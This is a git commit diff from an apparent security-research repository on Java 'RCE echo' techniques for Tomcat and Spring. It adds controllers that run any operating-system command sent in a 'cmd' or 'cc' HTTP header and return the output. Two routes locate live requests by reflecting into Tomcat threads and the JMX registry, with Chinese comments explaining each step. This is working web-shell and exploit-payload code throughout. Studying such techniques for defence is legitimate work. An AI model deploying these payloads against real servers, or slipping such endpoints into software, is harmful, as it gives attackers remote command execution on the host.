TomcatEcho

SummerSec · SummerSec · commit 996011252285 · 2021-06-22T10:01:20.000+08:00
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/SpringEcho.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/SpringEcho.java
@@ -0,0 +1,36 @@
+package summersec.echo.Controller;
+
+import org.springframework.stereotype.Controller;
+//import com.management.bean.User;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.ResponseBody;
+import java.io.*;
+
+/**
+ * @ClassName: SpringMVCTestController
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/6/17 18:25
+ * @Version: v1.0.0
+ * @Description:
+ **/
+@Controller
+class SpringEcho {
+    @ResponseBody
+    @RequestMapping(value="/echo", method = RequestMethod.GET)
+    public SpringEcho Test() throws IOException {
+
+        org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
+        javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
+        javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
+
+        String cmd = httprequest.getHeader("cmd");
+        if(cmd != null && !cmd.isEmpty()){
+            String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+            httpresponse.getWriter().println(res);
+        }
+
+        return new SpringEcho();
+    }
+}
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/TomcatEcho.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/TomcatEcho.java
@@ -9,7 +9,7 @@
  * @Author: Summer
  * @Date: 2021/6/16 17:16
  * @Version: v1.0.0
- * @Description:
+ * @Description:    header cc: "cmd"
  **/
 @Controller
 public class TomcatEcho {
@@ -27,53 +27,76 @@ public String two(){
     }
     @RequestMapping(value = "DEMO")
     public void DEMO()throws Exception {
+        // flag 标记作用
         boolean flag = false;
+        // 获取当前线程组
         ThreadGroup group = Thread.currentThread().getThreadGroup();
+        // 反射获取字段threads
         java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
         f.setAccessible(true);
+        // f.get(group) 获取 threads 线程中数组对象
         Thread[] threads = (Thread[]) f.get(group);
         for (int i = 0; i < threads.length; i++) {
+            //14
             try {
                 Thread t = threads[i];
                 if (t == null) {
                     continue;
                 }
+
                 String str = t.getName();
+                //http-nio-8090-BlockPoller continue  NoSuchField异常 i=3
                 if (str.contains("exec") || !str.contains("http")) {
                     continue;
                 }
+                //str = http-nio-8090-ClientPoller 进入下面 ps: i=14
+                // java.lang.Thread
                 f = t.getClass().getDeclaredField("target");
                 f.setAccessible(true);
+                // obj ->  NioEndpoint$Poller实例化对象
                 Object obj = f.get(t);
+                // NioEndpoint$Poller  implements Runnable
                 if (!(obj instanceof Runnable)) {
                     continue;
                 }
+                // this$0 是NioEndpoint对象
                 f = obj.getClass().getDeclaredField("this$0");
                 f.setAccessible(true);
+                // f.get(obj) --> org.apche.tomcat.util.net.NioEndpoint 对象
                 obj = f.get(obj);
+                // NioEndpoint extends AbstractJsseEndpoint<NioChannel, SocketChannel> -->extends AbstractEndpoint$Handler
+                //  AbstractEndpoint$Handler 是一个接口，在org.apche.coyote.AbstractProtocol$ConnectionsHanhler实现
                 try {
                     f = obj.getClass().getDeclaredField("handler");
                 } catch (NoSuchFieldException e) {
                     f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
                 }
+                // obj -->  org.apche.coyote.AbstractProtocol$ConnectionsHanhler
                 f.setAccessible(true);
                 obj = f.get(obj);
                 try {
                     f = obj.getClass().getSuperclass().getDeclaredField("global");
                 } catch (NoSuchFieldException e) {
+                    // AbstractProtocol$ConnectionsHanhler
                     f = obj.getClass().getDeclaredField("global");
                 }
+                // obj --> org.apche.coyote.RequestGroupInfo
                 f.setAccessible(true);
                 obj = f.get(obj);
                 f = obj.getClass().getDeclaredField("processors");
                 f.setAccessible(true);
+                // processors --> List<RequestInfo>
                 java.util.List processors = (java.util.List) (f.get(obj));
+                // processors.size() == 1
                 for (int j = 0; j < processors.size(); ++j) {
                     Object processor = processors.get(j);
                     f = processor.getClass().getDeclaredField("req");
                     f.setAccessible(true);
+                    // org.apche.coyote.Request
                     Object req = f.get(processor);
+                    // org.apche.coyote.Response
                     Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
+                    // header cc: "cmd"
                     str = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"CC"});
                     if (str != null && !str.isEmpty()) {
                         resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/TomcatEcho2.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/TomcatEcho2.java
@@ -0,0 +1,94 @@
+package summersec.echo.Controller;
+
+import com.sun.jmx.mbeanserver.NamedObject;
+import org.apache.tomcat.util.modeler.Registry;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+
+import com.sun.jmx.mbeanserver.NamedObject;
+import com.sun.jmx.mbeanserver.Repository;
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import org.apache.coyote.Request;
+import org.apache.tomcat.util.modeler.Registry;
+
+import javax.management.DynamicMBean;
+import javax.management.MBeanServer;
+import javax.management.ObjectName;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.nio.ByteBuffer;
+import java.util.*;
+
+/**
+ * @ClassName: TomcatEcho2
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/6/17 17:13
+ * @Version: v1.0.0
+ * @Description: https://github.com/feihong-cs/Java-Rce-Echo/blob/master/Tomcat/code/TomcatEchoTypeB-%E5%85%A8%E7%89%88%E6%9C%AC.jsp
+ * httpheader cc: "cmd"
+ **/
+@Controller
+public class TomcatEcho2 {
+
+    @RequestMapping(value = "TomcatEcho2")
+    public String TomcatEcho2(){
+        return "TomcatEcho2";
+
+    }
+    @RequestMapping(value = "DEMO2")
+    public void DEMO2()throws Exception{
+        boolean flag = false;
+        javax.management.MBeanServer mbeanServer = org.apache.tomcat.util.modeler.Registry.getRegistry((Object)null, (Object)null).getMBeanServer();
+        Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
+        field.setAccessible(true);
+        Object obj = field.get(mbeanServer);
+
+        field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
+        field.setAccessible(true);
+        Repository repository  = (Repository) field.get(obj);
+        Set<NamedObject> objectSet =  repository.query(new ObjectName("Catalina:type=GlobalRequestProcessor,*"), null);
+        for(NamedObject namedObject : objectSet){
+            DynamicMBean dynamicMBean = namedObject.getObject();
+            field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
+            field.setAccessible(true);
+            obj = field.get(dynamicMBean);
+            field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
+            field.setAccessible(true);
+            ArrayList procssors = (ArrayList) field.get(obj);
+            field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
+            field.setAccessible(true);
+            for(int i = 0; i < procssors.size(); i++){
+                Request req = (Request) field.get(procssors.get(i));
+                String cmd = req.getHeader("cc");
+                if(cmd != null && !cmd.isEmpty()){
+                    String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
+                    String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+                    byte[] result = (new Scanner((new ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter("\\A").next().getBytes(charsetName);
+                    Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
+                    try {
+                        Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
+                        obj = cls.newInstance();
+                        cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
+                        resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+                    } catch (NoSuchMethodException var5) {
+                        Class cls = Class.forName("java.nio.ByteBuffer");
+                        obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
+                        resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+                    }
+                    flag = true;
+                }
+                if(flag) {
+                    break;
+                }
+            }
+        }
+    }
+
+
+
+}
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Demo/DEMO.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Demo/DEMO.java
@@ -2,6 +2,9 @@
 
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
+import summersec.echo.Controller.TomcatEcho;
+
+import java.lang.reflect.Field;
 
 /**
  * @ClassName: DEMo
@@ -11,85 +14,52 @@
  * @Version: v1.0.0
  * @Description:
  **/
-@Controller
+//@Controller
 public class DEMO {
-//    @RequestMapping(value = "DEMO")
-//    public void DEMO()throws Exception {
-//        boolean flag = false;
-//        ThreadGroup group = Thread.currentThread().getThreadGroup();
-//        java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
-//        f.setAccessible(true);
-//        Thread[] threads = (Thread[]) f.get(group);
-//        for (int i = 0; i < threads.length; i++) {
-//            try {
-//                Thread t = threads[i];
-//                if (t == null) {
-//                    continue;
-//                }
-//                String str = t.getName();
-//                if (str.contains("exec") || !str.contains("http")) {
-//                    continue;
-//                }
-//                f = t.getClass().getDeclaredField("target");
-//                f.setAccessible(true);
-//                Object obj = f.get(t);
-//                if (!(obj instanceof Runnable)) {
-//                    continue;
-//                }
-//                f = obj.getClass().getDeclaredField("this$0");
-//                f.setAccessible(true);
-//                obj = f.get(obj);
-//                try {
-//                    f = obj.getClass().getDeclaredField("handler");
-//                } catch (NoSuchFieldException e) {
-//                    f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
-//                }
-//                f.setAccessible(true);
-//                obj = f.get(obj);
-//                try {
-//                    f = obj.getClass().getSuperclass().getDeclaredField("global");
-//                } catch (NoSuchFieldException e) {
-//                    f = obj.getClass().getDeclaredField("global");
-//                }
-//                f.setAccessible(true);
-//                obj = f.get(obj);
-//                f = obj.getClass().getDeclaredField("processors");
-//                f.setAccessible(true);
-//                java.util.List processors = (java.util.List) (f.get(obj));
-//                for (int j = 0; j < processors.size(); ++j) {
-//                    Object processor = processors.get(j);
-//                    f = processor.getClass().getDeclaredField("req");
-//                    f.setAccessible(true);
-//                    Object req = f.get(processor);
-//                    Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
-//                    str = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"CC"});
-//                    if (str != null && !str.isEmpty()) {
-//                        resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
-//                        String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", str} : new String[]{"/bin/sh", "-c", str};
-//                        byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
-//                        try {
-//                            Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
-//                            obj = cls.newInstance();
-//                            cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
-//                            resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
-//                        } catch (NoSuchMethodException var5) {
-//                            Class cls = Class.forName("java.nio.ByteBuffer");
-//                            obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
-//                            resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
-//                        }
-//                        flag = true;
-//                    }
-//                    if (flag) {
-//                        break;
-//                    }
-//                }
-//                if (flag) {
-//                    break;
-//                }
-//            } catch (Exception e) {
-//                continue;
-//            }
-//        }
-//    }
+    static class User {
+        public String name = " asd";
+        public TomcatEcho tomcatEcho = null;
+
+        public String getName() {
+            return name;
+        }
+
+        public TomcatEcho getTomcatEcho() {
+            return tomcatEcho;
+        }
+
+        public void setTomcatEcho(TomcatEcho tomcatEcho) {
+            this.tomcatEcho = tomcatEcho;
+        }
+
+        public void setName(String name) {
+            this.name = name;
+        }
+
+        public User(String name) {
+            this.name = name;
+        }
+
+        @Override
+        public String toString() {
+            return "User{" +
+                    "name='" + name + '\'' +
+                    '}';
+        }
+    }
+    public static void main(String[] args) {
+        User user = new User("sadqwe");
+        try {
+            Field name = user.getClass().getDeclaredField("tomcatEcho");
+            Object ob =  name.get(user.getClass());
+            String s = ob.getClass().getName();
+            System.out.println(s);
+
+        } catch (NoSuchFieldException | IllegalAccessException e) {
+            e.printStackTrace();
+        }
+
+
+    }
 
 }
